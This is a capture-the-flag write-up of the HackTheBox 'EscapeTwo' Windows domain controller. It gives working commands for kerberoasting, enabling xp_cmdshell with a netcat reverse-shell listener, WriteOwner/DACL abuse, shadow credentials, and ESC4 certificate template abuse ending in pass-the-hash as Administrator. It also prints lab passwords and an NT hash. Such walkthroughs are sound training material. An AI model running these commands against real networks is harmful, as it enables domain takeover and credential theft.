🚨 R1nzler

EscapeTwo

6 min read

Enumeration

INFO

HTB provides us with some valid credentials rose / KxEPkKe6R8su

  • As in all penetration test, we start with a [nmap scan
nmap -p- -sS -n -Pn --min-rate 5000 -open 10.10.11.51 -oG allPorts
  • Now we now that the target machine is a windows enviroment, lets preforme some version scan and use some commons scripts against this ports
sudo nmap -p 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49667,49689,49690,49691,49706,49722,49743,49810 -sCV --min-rate 5000 -n -Pn -open 10.10.11.51 -oN Targeted
  • So we have this information to be highlighted
    • we are in front of a Domain controller (DC01.sequel.htb)
    • DC is using kerberos to authentication
    • there are a ldap service
    • it have a ms-sql service
    • it have AD

LDAP Enumeration

  • We can try to enumerate LDAP protocol, using the given creds
ldapsearch -x -H ldap://10.10.11.51 -D 'sequel\rose' -w 'KxEPkKe6R8su' -b "DC=sequel,DC=htb"
 
or (faster)
 
ldapdomaindump 10.10.11.51 -u 'sequel\rose' -p 'KxEPkKe6R8su' --authtype SIMPLE

kerberos

  • after looking all directories, i didnt found no thing, so lets preform a kerberoasting attack with nxc
netexec ldap 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' --kerberoast kerb.txt

Pasted image 20250217020128.png

  • after trying crack him, they do not crack…
john kerb.txt --wordlist=/usr/share/wordlists/rockyou.txt

Pasted image 20250219190902.png

Bloodhaund enumeration

bloodhound-python -d sequel.htb -u rose -p KxEPkKe6R8su -c ALL -ns 10.10.11.51
  • And then import it to BloodHound, and we can see that there are only a user with admin rights Pasted image 20250219192824.png

There are 8 domain users Pasted image 20250219195347.png

  • the users: sql_svc and ca_svc looks so good Pasted image 20250219200216.png he can access to the sql data base Pasted image 20250219200455.png with this user we can issue certs, so lets use certipy-ad to enumerate CA

certipy-ad enumeration

  • we can twerk certipy to enumerate data in BloodHound format (and then we can import it)
certipy find -bloodhound -vulnerable -ns 10.10.11.51 -dc-ip 10.10.11.51 -u rose@sequel.htb -p 'KxEPkKe6R8su'
  • lets read the result, but own user dont have access Pasted image 20250219202033.png

SMB Enumeration

  • lets continue with the enumeration, now, smb:
nxc smb 10.10.11.51 -u rose -p 'KxEPkKe6R8su' --shares
 
or
 
impacket-smbclient sequel/rose:KxEPkKe6R8su@10.10.11.51
  • we have read permission over “accounting department”, lets download the content Pasted image 20250219202706.png
  • if we try to open with LibreOffice, the documents are corrupted Pasted image 20250219203051.png
  • but xlsx files are archives that contains spreadsheets so we can unzip him and check
unzip accouns.xlsx
libreoffice xl/sharedStrings.xml

Pasted image 20250219203902.png

First NameLast NameEmailUsernamePassword
AngelaMartinangela@sequel.htbangela0fwz7Q4mSpurIt99
OscarMartinezoscar@sequel.htboscar86LxLBMgEWaKUnBG
KevinMalonekevin@sequel.htbkevinMd9Wlq1E5bZnVDVo
NULLNULLsa@sequel.htbsaMSSQLP@ssw0rd!

we can use this password in john to crack the tickets but they didnt work

Foothold

Enumerating as ca

  • the most important user here is sa because is the admin user of mssql, so lets try to login as ac firts (if we dont find nothing we can try the other users)
mssqlclient.py sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51
  • now we have to enable xp_cmdshell
enable_xp_cmdshell
RECONFIGURE

Pasted image 20250220115526.png

rlwrap -cAr nc -nlvp 4444
  • then send the payload

Pasted image 20250220120007.png

  • perfect now the have access to the system, lets enumerate some interesting resources Pasted image 20250220122514.png
  • Perfect!, now we have an other password WqSZAF6CysDQbGb3, lets tests this password to the users that we dont have password yet
nxc smb 10.10.11.51 -u ./users -p ./passwords -k --continue-on-success | grep -e "[+]"

Pasted image 20250220123855.png

Lateral Movement

evil-winrm --ip 10.10.11.51 --user ryan --password WqSZAF6CysDQbGb3
  • get the user flag Pasted image 20250220124847.png

Privilege Escalation

  • if we check BloodHound we can see that ryan has (as first degree object control) writeOwner over CA_SVC user Pasted image 20250220125521.png

If we have WriteOwner over a:

  • User:

    • We can assign all rights to another account which will allow us to perform a Password Reset via a Force Change Password Attack, Targeted Kerberoasting Attack or a Shadow Credentials Attack.
      • I would like to perform a targeted Kerberoasting Attack or Shadow Credentials attack, mainly as I do not like changing users passwords if I don’t have to.

  • Group:

    • We can add or remove members after we grant the new owner (which we control full privileges)

  • GPO:

    • We can modify it.
    • GPO Attacks as well other DACL abuses (such as computer attacks).

  • that’s means that we hace control over a privileged user Pasted image 20250220125733.png

  • first we have to get the ca_svc hash using kerberoasting technique using targetedKerberoast.py

python3 targetedKerberoast.py -v -d sequel.htb -u rose -p KxEPkKe6R8su --request-user ca_svc -o ca_svc.kerb

Pasted image 20250220135034.png

but we cant brute force him

owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' sequel.htb/ryan:WqSZAF6CysDQbGb3

Pasted image 20250220135700.png

You have to try it some times, because the first time i have run the script, the user was not the correct

  • now we can grant ryan full privileges over ca_svc using dacledit.py
dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' sequel.htb/ryan:WqSZAF6CysDQbGb3

Pasted image 20250220133230.png

python3 pywhisker.py -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3 --target "CA_SVC" --action "add" --filename CACert --export PEM

Pasted image 20250220140456.png Pasted image 20250220141515.png

  • We can have full control over ac_svc so lets request a TGT for this user, using gettgtpkinit.py
python3 ../../PKINITtools/gettgtpkinit.py -cert-pem CACert_cert.pem -key-pem CACert_priv.pem sequel.htb/ca_svc ca_svc.ccache

Pasted image 20250220151614.png

save this key for the next step 2c9b71a0695508a8e51[snip]6eb5db62ddbc86b1a

  • Perfect now we can use this file .cache to get the NTLM hash of the user Pasted image 20250220150514.png
python3 ../../PKINITtools/getnthash.py -key 2c9b71a0695508a8e51[snip]62ddbc86b1a sequel.htb/ca_svc

Pasted image 20250220151855.png

  • So we got the NT hash we can use it to pass-the-hash of the user ca_svc
nxc smb 10.10.11.51 -u 'ca_svc' -H '3b181b91[snip]bc2b7fce' -k --continue-on-success | grep -e "[+]"

Pasted image 20250220152234.png

  • Nice! NT hash works perfectly, we can run certify again but with this credentials
certipy find -stdout -vulnerable -ns 10.10.11.51 -dc-ip 10.10.11.51 -u ca_svc@sequel.htb -hashes :'3b181b914e7[snip]c2b7fce'

Pasted image 20250220152818.png

  • this cert is vulnerable to the EZC4 attack vector (As we are part of cert publisher group we can attack) Pasted image 20250220153000.png

  • lest perform the attack,

certipy template -username ca_svc@sequel.htb -hashes :'3b181b914e7a9d5508ea1e20bc2b7fce' -template DunderMifflinAuthentication -save-old

Pasted image 20250220153352.png

certipy req -username ca_svc@sequel.htb -hashes :'3b181b914e7[snip]1e20bc2b7fce' -ca sequel-DC01-CA -target DC01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51

Pasted image 20250220154109.png

  • perfect now we have a certificate to authenticate Administrator into DC, we can use certify to get the NTLM hash of this user
certipy auth -pfx administrator.pfx -domain sequel.htb

Pasted image 20250220154841.png

  • lets perform a pass-the-hash attack
evil-winrm --ip 10.10.11.51 -u Administrator -H '7a8d4e[snip]60f75e5a0b3ff'

Pasted image 20250220155628.png

  • Now we are admin: Pasted image 20250220160118.png

Root:MyLittlePony69!

Graph View